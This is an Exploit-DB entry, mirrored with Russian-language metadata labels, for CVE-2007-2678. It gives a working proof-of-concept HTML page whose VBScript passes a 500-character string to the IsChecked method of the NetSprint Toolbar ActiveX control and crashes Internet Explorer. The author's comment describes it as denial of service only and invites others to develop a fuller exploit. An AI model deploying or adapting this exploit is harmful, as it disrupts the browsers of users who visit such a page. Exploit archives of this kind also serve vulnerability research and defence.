- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3790
- Проверка EDB
-
- Пройдено
- Автор
- UMESH WANVE
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2007-2678
- Дата публикации
- 2007-04-24
HTML:
<!--
===============================================================================================
NetSprint Toolbar ActiveX toolbar.dll DOS POC
By Umesh Wanve
==============================================================================================
Date : 24-04-2007
Tested on: Windows 2000 SP4 Server English
Windows 2000 SP4 Professional English
Reference: https://www.securityfocus.com/bid/23530
Vendor: http://netsprint.pl/toolbar/install.html
Desc: This is very interesting vulnerability. The function ischecked() takes URL as string parameter.
But actually it is not handled by dll. When we don't give any parameter i.e. target.ischecked "" the
IE works fine. But when we supply data as parameter the IE crashes. Interestingly you can able to
see your data on the stack. But I am not able to overwrite any registers or SEH. So though our
data is on the stack. Its hard to exploit. So only dos.
May be someone can get success in this. Let me know if u find.
PS. This was written for educational purpose. Use it at your own risk.Author will be not be
responsible for any damage.
Always thanks to Metasploit and Stroke.
-->
<html>
<title>
NetSprint Toolbar ActiveX toolbar.dll DOS POC - By Umesh Wanve
</title>
<body>
<OBJECT id="target" WIDTH=445 HEIGHT=40 classid="clsid:34F459B8-1D37-4FF2-9EFA-192D8E3ABA6F" > </OBJECT>
<script language="vbscript">
targetFile = "C:\WINNT\Downloaded Program Files\toolbar.dll"
prototype = "Function IsChecked ( ByVal url As String ) As Long"
memberName = "IsChecked"
progid = "SoftomateLib.SoftomateObj"
argCount = 1
arg1=String(500, "A")
target.IsChecked arg1
</script>
</body>
</html>
# milw0rm.com [2007-04-24]
- Источник
- www.exploit-db.com